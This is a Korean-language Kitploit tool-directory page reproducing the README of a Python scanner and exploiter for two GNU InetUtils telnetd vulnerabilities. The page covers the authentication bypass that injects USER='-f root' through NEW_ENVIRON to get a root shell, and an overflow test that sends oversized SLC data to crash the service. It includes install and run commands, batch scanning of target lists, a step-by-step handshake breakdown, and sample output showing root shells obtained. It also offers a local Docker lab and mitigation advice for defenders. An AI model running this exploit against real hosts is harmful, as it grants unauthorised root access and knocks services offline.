Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
telnet_scan — 스캐너/익스플로이터 CVE-2026-24061 & CVE-2026-32746 | Kitploit
도구/GitHubGitHub/ekomssavior/telnet_scan
Vulnerability ScannersExploitationNetwork SecurityPenetration TestingAuthenticationLearning & EducationBinary ExploitationLabs & Practice
GitHubekomssavior/telnet_scan

telnet_scan

스캐너/익스플로이터 CVE-2026-24061 & CVE-2026-32746

저장소 보기
1163개월 전아직 검토되지 않음

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유

Telnet 취약점 스캐너 (CVE-2026-24061 및 CVE-2026-32746)

License:ek0ms

GNU InetUtils telnetd에서 두 가지 심각한 취약점을 탐지하고 (해당되는 경우) 악용하는 Python 기반 보안 평가 도구입니다:

  • CVE-2026-24061 – USER 환경 변수 주입을 통한 인증 우회 (CVSS 9.8)
  • CVE-2026-32746 – LINEMODE SLC 핸들러의 사전 인증 버퍼 오버플로우 (CVSS 9.8)

중요 면책 조항

이 도구는 승인된 보안 테스트 및 교육 목적으로만 사용해야 합니다.
소유하지 않거나 명시적인 테스트 허가를 받지 않은 시스템에 무단으로 사용하는 것은 불법입니다. 저자는 이 도구의 오용이나 이로 인한 손해에 대해 어떠한 책임도 지지 않습니다. 사용에 따른 모든 위험은 사용자 본인에게 있습니다.

image1(1)

기능

  • 단일 대상 스캔 – 실행 시 IP 주소 또는 도메인 이름 입력
  • 배치 스캔 – 여러 대상이 포함된 파일 업로드 (한 줄에 하나)
  • 선택적 테스트 – 개별 취약점 또는 둘 다 테스트
  • CVE-2026-24061 악용 – 취약할 경우 동일한 터미널에서 대화형 루트 쉘로 연결
  • CVE-2026-32746 탐지 – 통제된 크래시 감지를 통해 취약 시스템 식별
  • 깔끔한 터미널 처리 – 종료 시 적절히 복원되는 raw 모드 쉘
  • 연결 검증 – 필터링된 포트, 오프라인 서비스, 실제 취약점 구분
  • 상세 디버깅 – TELNET_SCAN_VERBOSE=1 설정 시 모든 IAC 패킷 및 단계별 익스플로잇 설명 확인
  • Docker 실습 환경 – 안전한 테스트를 위한 자체 포함 취약 대상

설치

root@kitploit:~
git clone https://github.com/ekomsSavior/telnet_scan.git
cd telnet_scan
chmod +x telnet_scanner.py

사용법

기본 실행

root@kitploit:~
python3 telnet_scanner.py

Docker 실습 환경 (안전한 테스트)

실제 시스템을 위험에 빠뜨리지 않고 알려진 취약 대상에 대해 익스플로잇을 테스트합니다:

root@kitploit:~
cd lab
docker compose up -d
cd ..
python3 telnet_scanner.py
# 대상: 127.0.0.1, 포트: 2323

실습 환경은 격리된 컨테이너에서 취약한 GNU InetUtils 2.5 telnetd를 실행하며, 로컬호스트에만 바인딩됩니다. 네트워크에 노출되지 않습니다.

상세 모드 (Verbose Mode)

Telnet 핸드셰이크를 디버깅하고 네트워크 상에서 정확히 어떤 일이 일어나는지 확인합니다:

root@kitploit:~
TELNET_SCAN_VERBOSE=1 python3 telnet_scanner.py

상세 출력 내용:

  • 전송 및 수신된 모든 IAC 명령 (DO/WILL/SB)
  • 디코딩된 telnet 옵션 이름
  • 하위 협상(subnegotiation)의 페이로드 16진수 덤프
  • 단계별 익스플로잇 흐름 (6단계 핸드셰이크)

IMG_2498

단일 대상 작업 흐름

  1. 옵션 1 선택
  2. 대상 입력 (IP 또는 도메인, 예: 192.168.1.100 또는 example.com)
  3. 포트 지정 (비워두면 기본값 23)
  4. 테스트 유형 선택:
    • 1 – 두 취약점 모두
    • 2 – CVE-2026-24061만 (인증 우회)
    • 3 – CVE-2026-32746만 (버퍼 오버플로우)

배치 스캔 작업 흐름

  1. 대상이 한 줄에 하나씩 적힌 파일 생성 예시 targets.txt:
    root@kitploit:~
    192.168.1.100
    192.168.1.101
    10.0.0.50
    example.com
    # 이 줄은 주석입니다 - 무시됨
    
  2. 옵션 2 선택
  3. 파일명 입력
  4. 포트 지정 (비워두면 기본값 23)
  5. 테스트 유형 선택 (1, 2 또는 3)
  6. 스캐너가 다음을 수행합니다:
    • 각 대상에 대한 진행 상황 표시
    • 완료 시 결과 표시
    • 마지막에 요약 테이블 제공

쉘 획득 시

CVE-2026-24061이 성공한 경우:

  1. 취약점이 탐지됩니다
  2. 대화형 루트 쉘이 동일한 터미널 창에 직접 나타납니다
  3. 명령어를 입력하고 즉시 출력을 확인합니다 (예: id, whoami, ls)
  4. Ctrl+C를 눌러 쉘을 종료하고 스캐너 메뉴로 돌아갑니다
  5. 배치 스캔의 경우 쉘과 상호작용할지 계속 스캔할지 묻는 메시지가 표시됩니다

별도의 터미널이나 추가 단계가 필요하지 않습니다.

작동 방식

CVE-2026-24061 – 인증 우회

익스플로잇은 실제 GNU InetUtils telnetd와의 호환성을 보장하기 위해 정확한 6단계 telnet 핸드셰이크를 따릅니다:

  1. 서버 협상 대기 – 최대 15초 동안 역방향 DNS 및 초기 DO 옵션 대기
  2. WILL 응답 – TTYPE, TSPEED, XDISPLOC, NEW_ENVIRON 응답
  3. SB SEND 대기 – 서버의 하위 협상 요청 대기
  4. 익스플로잇 페이로드 전송 – NEW_ENVIRON 하위 협상을 통해 USER="-f root" 설정
  5. 남은 교환 처리 – SGA, ECHO, LINEMODE, NAWS에 대한 DO/WILL 응답
  6. 쉘 탐지 – # , , 또는 프롬프트 감지

Keepalive 스레드는 2초마다 IAC NOP을 전송하여 telnetd의 ttloop()가 EOF를 감지하고 페이로드가 처리되기 전에 exit(1)을 호출하는 것을 방지합니다.

취약한 telnetd는 /usr/bin/login에 -f root를 전달하여 인증을 우회하고 즉시 루트 쉘 접근을 허용합니다.

CVE-2026-32746 – 버퍼 오버플로우 탐지

  • LINEMODE 옵션(RFC 1184) 협상
  • 500개 이상의 SLC 트리플릿(1500+ 바이트)을 전송하여 고정 크기 버퍼 오버플로우 유발
  • 연결 재설정/크래시 모니터링을 통해 취약점 확인

연결 검증

  • 익스플로잇 시도 전에 서비스 가용성을 사전 스캔
  • 다음 구분:
    • 필터링된 포트 (방화벽 차단)
    • 오프라인 서비스 (실행 중인 서비스 없음)
    • 취약한 서비스 (익스플로잇 성공)

샘플 출력

단일 대상

root@kitploit:~
=== Telnet Vulnerability Scanner ===
1. Scan a single target
2. Scan targets from file (one IP/hostname per line)
3. Exit

Choose option: 1
Port (default 23): 

Which tests to run?
1. Both
2. Only CVE-2026-24061 (auth bypass - gives shell if vulnerable)
3. Only CVE-2026-32746 (buffer overflow detection)
Choice [1-3]: 1
Target (IP or domain): 192.168.1.100

[*] Resolved 192.168.1.100 -> 192.168.1.100
[*] Scanning 192.168.1.100:23...

[*] Checking if service is reachable...
[+] Service reachable

[*] Testing CVE-2026-24061 (authentication bypass)...
[!] CVE-2026-24061: VULNERABLE – shell obtained!

============================================================
[+] ROOT SHELL OBTAINED! You are now in an interactive root shell.
[+] Type commands directly here. Press Ctrl+C to exit shell.
============================================================

id
uid=0(root) gid=0(root) groups=0(root)

상세 모드 출력 (일부)

root@kitploit:~
    [STEP 1/6] Waiting for server negotiation (may take up to 15s)...
    [STEP 1/6] Got 48 bytes: fffb18fffb20fffb23fffb27...
           decoded: IAC DO TERMINAL-TYPE
           decoded: IAC DO TERMINAL-SPEED  
           decoded: IAC DO X-DISPLAY-LOCATION
           decoded: IAC DO NEW-ENVIRON
    [STEP 2/6] Responding WILL to all DO options
    [STEP 3/6] Waiting for SB SEND subnegotiation requests...
    [STEP 4/6] Sending subnegotiation responses...
               NEW-ENVIRON IS VAR USER VALUE "-f root"  *** EXPLOIT ***
    [STEP 5/6] Handling remaining option negotiations...
    [STEP 5/6] Text received: 'root@vuln-lab:~# '
    [RESULT] SUCCESS: Passwordless root login via USER="-f root" injection

배치 스캔

root@kitploit:~
=== Telnet Vulnerability Scanner ===
1. Scan a single target
2. Scan targets from file (one IP/hostname per line)
3. Exit

Choose option: 2
Port (default 23): 
Enter filename with targets (one per line): targets.txt

Which tests to run?
1. Both
2. Only CVE-2026-24061 (auth bypass - gives shell if vulnerable)
3. Only CVE-2026-32746 (buffer overflow detection)
Choice [1-3]: 1

[*] Loaded 3 targets from targets.txt

==================================================
[1/3] Scanning 192.168.1.100:23
==================================================
[*] Resolved 192.168.1.100 -> 192.168.1.100
[+] Service reachable

[*] Testing CVE-2026-24061...
[!] CVE-2026-24061: VULNERABLE – shell obtained!

[?] Shell obtained! Interact now? (y/N): n

[*] Testing CVE-2026-32746...
[+] Server did not crash; likely not vulnerable

==================================================
[2/3] Scanning 192.168.1.101:23
==================================================
[-] Service not reachable on 192.168.1.101:23

==================================================
[3/3] Scanning example.com:23
==================================================
[*] Resolved example.com -> 93.184.216.34
[+] Service reachable

[*] Testing CVE-2026-24061...
[+] No response received; may still be vulnerable

[*] Testing CVE-2026-32746...
[!] CVE-2026-32746: VULNERABLE (server crashed)

============================================================
SCAN SUMMARY
============================================================
192.168.1.100: VULNERABLE to CVE-2026-24061
192.168.1.101: Service unreachable
example.com: VULNERABLE to CVE-2026-32746
============================================================

완화 조치

취약한 시스템을 발견한 경우 다음 수정 사항을 적용하십시오:

  1. GNU InetUtils를 버전 2.8 이상으로 업그레이드
  2. telnetd 비활성화 및 네트워크 경계에서 TCP/23 차단
  3. 신뢰할 수 있는 네트워크로만 액세스 제한
  4. 로그 모니터링 – -f로 시작하는 NEW_ENVIRON USER 값이 있는 연결 확인

개발 및 테스트

Docker 실습 환경

포함된 lab/ 디렉토리는 안전하고 재현 가능한 테스트 환경을 제공합니다:

root@kitploit:~
cd lab
docker compose up -d
# telnetd 초기화를 위해 약 10초 대기
python3 ../telnet_scanner.py
# 대상: 127.0.0.1, 포트: 2323

실습 환경 특징:

  • 취약한 버전의 GNU InetUtils 2.5를 소스에서 컴파일
  • 격리된 컨테이너에서 telnetd 실행
  • 로컬호스트:2323에만 바인딩 – 개발에 안전
  • 디버깅용 테스트 사용자 포함 (labuser:labpass123)

실습 환경 종료:

root@kitploit:~
cd lab && docker compose down

알려진 제한 사항

  • 오버플로우 테스트(CVE-2026-32746)는 대상 telnetd 서비스를 중단시킬 수 있음
  • 대화형 쉘에서 화살표 키 및 터미널 크기 조정이 완전히 지원되지 않음
  • 일부 방화벽 또는 네트워크 구성이 Telnet 옵션 협상에 영향을 줄 수 있음
  • Windows 사용자: 대화형 쉘은 Unix 계열 터미널이 필요함 (WSL, Cygwin, Linux/macOS)

image0(2)

감사의 말

@leetcrypt에게 특별히 감사드립니다 – 적절한 6단계 핸드셰이크, keepalive 스레드, 상세 모드, Docker 실습 환경이 훌륭합니다!


면책 조항: 승인된 보안 테스트 및 교육 목적으로만 사용하십시오.

도구 다운로드
root@
$